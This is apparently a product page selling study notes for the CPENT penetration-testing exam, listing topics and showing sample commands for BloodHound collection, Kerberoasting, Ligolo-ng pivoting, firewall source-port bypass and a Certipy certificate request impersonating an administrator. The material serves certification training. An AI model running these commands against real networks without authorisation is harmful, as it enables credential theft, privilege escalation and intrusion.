Back to Main Page
DIGITAL GOODS · INSTANT ACCESS

What's Inside

Active Directory

  • BloodHound attack paths
  • Kerberoast / AS-REP / delegation
  • ACL abuse, RBCD & ADCS (ESC1–ESC8)
  • DCSync & credential dumping

Pivoting & Filter Evasion

  • Ligolo-ng, Chisel, SSH, socat
  • Double pivoting workflows
  • Stateless filter rule mapping
  • Source-port & fragmentation bypass

Binaries & IoT

  • Ghidra / radare2 reversing
  • Stack overflow & protection bypass
  • Custom exploits with pwntools
  • Firmware extraction & analysis

Web, API & CTF

  • SQLi, LFI, upload, SSTI, deserialization
  • API, BOLA/IDOR & JWT attacks
  • WAF bypass techniques
  • Secret key & flag hunting

Reporting

  • Report structure & finding template
  • CVSS v3.1 scoring guide
  • Evidence & screenshot checklist
  • Sample findings you can adapt

AI-Assisted Pentesting

  • AI across the pentest lifecycle
  • Recon & enumeration automation
  • Prompt library (offline-safe)
  • AI-assisted report writing

CPENT Format

24h
or two 12-hour sessions
70%
to earn CPENT
90%
for LPT (Master)
5
penetration zones

Sample Copy-Paste Commands from the Vault

# BloodHound collection
bloodhound-python -d domain.local -u user -p pass -ns 10.10.1.20 -c All

# Kerberoasting with Impacket
GetUserSPNs.py domain.local/user:pass -dc-ip 10.10.1.20 -request

# Double pivot with Ligolo-ng
sudo ip tuntap add user $(whoami) mode tun ligolo
./ligolo-ng_proxy -selfcert -laddr 0.0.0.0:11601
./agent -connect 10.10.14.5:11601 -ignore-cert
sudo ip route add 172.16.0.0/24 dev ligolo

# Stateless firewall bypass
nmap --source-port 20 -Pn -p- 172.16.0.10

# ADCS ESC1 with Certipy
certipy req -u [email protected] -p pass -ca CA-NAME -template Vuln -upn [email protected] -dc-ip 10.10.1.20
                

Tools & Techniques Covered

Nmap / RustScan
ffuf / feroxbuster
BloodHound
NetExec / Impacket
Kerbrute / Rubeus
Mimikatz
Certipy (ADCS)
Ligolo-ng / Chisel
sqlmap
pwntools / GDB
Ghidra / radare2
Binwalk / Firmware
Hashcat / John
Evil-WinRM
Wireless / 802.1X

Why These Notes Work

Zone-Ordered Notes

  • Organised around the real CPENT zones
  • Quick lookup while the clock is running

Copy-Paste Commands

  • Every phase from recon to report
  • 40+ tool cheatsheets in one place

Built for the 24-Hour Window

  • Time management & test-day checklist
  • Double pivoting — the part most people fail

Frequently Asked Questions

What format are the notes in?

An Obsidian vault (Markdown) with 130+ notes across 18 organised sections and 40+ tool cheatsheets. Open the folder directly in Obsidian, or read the Markdown in any editor.

What does it cover?

Every CPENT zone: Active Directory, Binaries, IoT, Web and CTF. Plus methodology, scan tuning and perimeter evasion, double pivoting, Windows & Linux privilege escalation, web & API, binary exploitation, OT/SCADA, wireless, cloud, reporting and AI-assisted pentesting.

Are these official EC-Council materials?

No. These are independent study notes compiled by Zishan Ahamed Thandar. Not official EC-Council material and not affiliated with or endorsed by EC-Council.

Do the notes cover the CPENT format?

Yes. The vault guide covers the 24-hour or two 12-hour session format, the 70% CPENT pass mark, the 90% LPT (Master) threshold, proctoring, the Aspen portal and report submission.

Do you offer updates?

Yes. All buyers receive lifetime updates for free and are notified by email when new versions are available.

What is your refund policy?

Due to the digital nature of the product, all sales are final. We do not offer refunds once products are downloaded or accessed. Please review carefully before purchasing.

Ready to Ace CPENT?

130+ notes · 40+ tool cheatsheets · every CPENT zone covered · updated for 2026

Get the CPENT Vault Now